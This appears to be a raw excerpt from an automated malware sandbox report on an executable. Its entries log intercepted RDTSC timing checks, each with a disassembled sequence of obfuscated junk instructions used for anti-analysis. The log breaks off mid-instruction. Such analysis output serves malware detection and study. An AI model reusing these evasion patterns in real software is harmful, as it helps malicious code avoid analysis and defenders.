                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F839 second address: F7F83D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F83D second address: F7F854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnc 00007FD358DA46D6h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F854 second address: F7F858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F7F9FF second address: F7FA16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jng 00007FD358DA46D6h 0x00000009 je 00007FD358DA46D6h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F925EA second address: F925EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F925EE second address: F925FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F925FF second address: F9260B instructions: 0x00000000 rdtsc 0x00000002 je 00007FD358ED10FEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F90759 second address: F9078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b jnp 00007FD358DA4706h 0x00000011 je 00007FD358DA46DCh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD358DA46E0h 0x0000001e jno 00007FD358DA46D6h 0x00000024 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: F9078E second address: F90794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FA120C second address: FA124A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jmp 00007FD358DA46E4h 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FD358DA46E6h 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9739 second address: FB9757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1109h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9757 second address: FB975D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB98F5 second address: FB9905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FD358ED10FAh 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9A6D second address: FB9A73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9A73 second address: FB9A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007FD358ED10F6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9A8B second address: FB9A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9D79 second address: FB9D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9D7D second address: FB9D8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FD358DA46D6h 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FB9D8D second address: FB9D97 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD358ED10F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FBA1D9 second address: FBA1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FBA1E2 second address: FBA1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FBA4E8 second address: FBA4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FBA4F2 second address: FBA50A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jmp 00007FD358ED1100h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FBA660 second address: FBA66A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD358DA46DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FC08D1 second address: FC08D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FC04BA second address: FC04BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: FC04BF second address: FC04D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD358ED10F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EDA87D second address: EDA88F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD358DA46DAh 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56103B5 second address: 5610477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 3C55A214h 0x00000008 push edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 pushfd 0x00000013 jmp 00007FD358ED10FEh 0x00000018 or ecx, 4AE7C9C8h 0x0000001e jmp 00007FD358ED10FBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov dword ptr [esp], ebp 0x00000028 pushad 0x00000029 movzx ecx, bx 0x0000002c jmp 00007FD358ED1101h 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FD358ED10FCh 0x0000003b adc ecx, 407E8F58h 0x00000041 jmp 00007FD358ED10FBh 0x00000046 popfd 0x00000047 call 00007FD358ED1108h 0x0000004c pushfd 0x0000004d jmp 00007FD358ED1102h 0x00000052 sbb cl, FFFFFFE8h 0x00000055 jmp 00007FD358ED10FBh 0x0000005a popfd 0x0000005b pop eax 0x0000005c popad 0x0000005d mov edx, dword ptr [ebp+0Ch] 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007FD358ED1102h 0x00000067 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5610477 second address: 561047E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 561047E second address: 561048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56104A0 second address: 56104A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56104A6 second address: 56104C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1107h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56104C8 second address: 56104CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56104CC second address: 56104D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56104D0 second address: 56104D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56306D3 second address: 56306D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56306D9 second address: 563071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD358DA46E2h 0x00000009 sub eax, 04B2E908h 0x0000000f jmp 00007FD358DA46DBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD358DA46E2h 0x00000022 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 563071B second address: 5630721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630721 second address: 5630725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630725 second address: 56307C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD358ED10FFh 0x00000010 sub ah, FFFFFFAEh 0x00000013 jmp 00007FD358ED1109h 0x00000018 popfd 0x00000019 mov eax, 15D8DF37h 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 jmp 00007FD358ED10FAh 0x00000026 xchg eax, ecx 0x00000027 pushad 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD358ED10FCh 0x0000002f or ecx, 511AA358h 0x00000035 jmp 00007FD358ED10FBh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FD358ED1108h 0x00000041 xor ah, FFFFFFB8h 0x00000044 jmp 00007FD358ED10FBh 0x00000049 popfd 0x0000004a popad 0x0000004b mov cx, 71EFh 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56307C5 second address: 56307C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56307C9 second address: 56307CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56307CF second address: 563081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FD358DA46DEh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FD358DA46E0h 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD358DA46DEh 0x0000001d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 563081D second address: 5630880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ebx, 473C10B4h 0x00000011 mov cx, bx 0x00000014 popad 0x00000015 popad 0x00000016 lea eax, dword ptr [ebp-04h] 0x00000019 jmp 00007FD358ED10FFh 0x0000001e nop 0x0000001f pushad 0x00000020 mov ecx, 56B75D8Bh 0x00000025 pushfd 0x00000026 jmp 00007FD358ED1100h 0x0000002b or ax, 3198h 0x00000030 jmp 00007FD358ED10FBh 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov cx, E561h 0x0000003f pushad 0x00000040 popad 0x00000041 popad 0x00000042 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630880 second address: 563089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46E8h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 563089C second address: 56308D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FD358ED1106h 0x00000011 push dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD358ED10FAh 0x0000001d rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56308D5 second address: 56308E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5630939 second address: 563093F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56309CE second address: 56201BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD358DA46DFh 0x00000009 and ch, 0000006Eh 0x0000000c jmp 00007FD358DA46E9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007FD358DA46E0h 0x00000018 sub ax, 9AE8h 0x0000001d jmp 00007FD358DA46DBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 retn 0004h 0x00000029 nop 0x0000002a sub esp, 04h 0x0000002d cmp eax, 00000000h 0x00000030 setne al 0x00000033 xor ebx, ebx 0x00000035 test al, 01h 0x00000037 jne 00007FD358DA46D7h 0x00000039 mov dword ptr [esp], 0000000Dh 0x00000040 call 00007FD35D6C1AAFh 0x00000045 mov edi, edi 0x00000047 pushad 0x00000048 mov cl, D1h 0x0000004a mov di, 37C4h 0x0000004e popad 0x0000004f push edx 0x00000050 jmp 00007FD358DA46E8h 0x00000055 mov dword ptr [esp], ebp 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FD358DA46E7h 0x0000005f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56201BF second address: 56201D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dx, 96D8h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56201D3 second address: 56201D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56201D7 second address: 56201DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56201DD second address: 5620206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD358DA46E5h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620206 second address: 5620269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD358ED1107h 0x00000009 and ax, CBAEh 0x0000000e jmp 00007FD358ED1109h 0x00000013 popfd 0x00000014 call 00007FD358ED1100h 0x00000019 pop eax 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebx 0x0000001e pushad 0x0000001f movzx ecx, di 0x00000022 push ebx 0x00000023 mov ax, F13Bh 0x00000027 pop ecx 0x00000028 popad 0x00000029 mov dword ptr [esp], ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620269 second address: 562026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 562026D second address: 5620273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620273 second address: 5620285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DEh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620285 second address: 5620289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620289 second address: 5620298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c movzx esi, dx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620298 second address: 56202E8 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD358ED1105h 0x00000008 xor eax, 473B3D56h 0x0000000e jmp 00007FD358ED1101h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dl, ch 0x00000018 popad 0x00000019 mov dword ptr [esp], edi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD358ED1106h 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 562035E second address: 562036D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 562036D second address: 56203D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3D53331Ah 0x00000008 push edi 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d inc ebx 0x0000000e jmp 00007FD358ED10FDh 0x00000013 test al, al 0x00000015 jmp 00007FD358ED10FEh 0x0000001a je 00007FD358ED1374h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 pushfd 0x00000026 jmp 00007FD358ED1103h 0x0000002b add ax, 4ECEh 0x00000030 jmp 00007FD358ED1109h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56203D7 second address: 562043A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 call 00007FD358DA46E9h 0x00000015 pushfd 0x00000016 jmp 00007FD358DA46E0h 0x0000001b or ah, FFFFFFD8h 0x0000001e jmp 00007FD358DA46DBh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov dword ptr [ebp-14h], edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e movzx esi, dx 0x00000031 popad 0x00000032 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620516 second address: 562051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 562051A second address: 5620520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620520 second address: 5620586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD358ED1108h 0x00000008 pop esi 0x00000009 pushfd 0x0000000a jmp 00007FD358ED10FBh 0x0000000f sub ecx, 494D4D3Eh 0x00000015 jmp 00007FD358ED1109h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e jg 00007FD3C994F017h 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov eax, edi 0x00000029 jmp 00007FD358ED10FFh 0x0000002e popad 0x0000002f rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620586 second address: 562058C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 562058C second address: 562059F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD358ED1178h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 562059F second address: 56205A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56205A5 second address: 56205AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 56205AA second address: 5620603 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 pushfd 0x00000011 jmp 00007FD358DA46E8h 0x00000016 and ecx, 062B5628h 0x0000001c jmp 00007FD358DA46DBh 0x00000021 popfd 0x00000022 popad 0x00000023 jne 00007FD3C982257Bh 0x00000029 pushad 0x0000002a mov al, EEh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ebx 0x0000002f pop esi 0x00000030 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: 5620603 second address: 56206AF instructions: 0x00000000 rdtsc 0x00000002 call 00007FD358ED1103h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 jmp 00007FD358ED1101h 0x00000016 popad 0x00000017 lea eax, dword ptr [ebp-2Ch] 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD358ED10FCh 0x00000021 sub esi, 560F5E18h 0x00000027 jmp 00007FD358ED10FBh 0x0000002c popfd 0x0000002d push ecx 0x0000002e jmp 00007FD358ED10FFh 0x00000033 pop ecx 0x00000034 popad 0x00000035 push ecx 0x00000036 pushad 0x00000037 mov esi, 4BD11B51h 0x0000003c mov edi, ecx 0x0000003e popad 0x0000003f mov dword ptr [esp], esi 0x00000042 pushad 0x00000043 mov ax, 2F45h 0x00000047 movzx ecx, dx 0x0000004a popad 0x0000004b push ebp 0x0000004c jmp 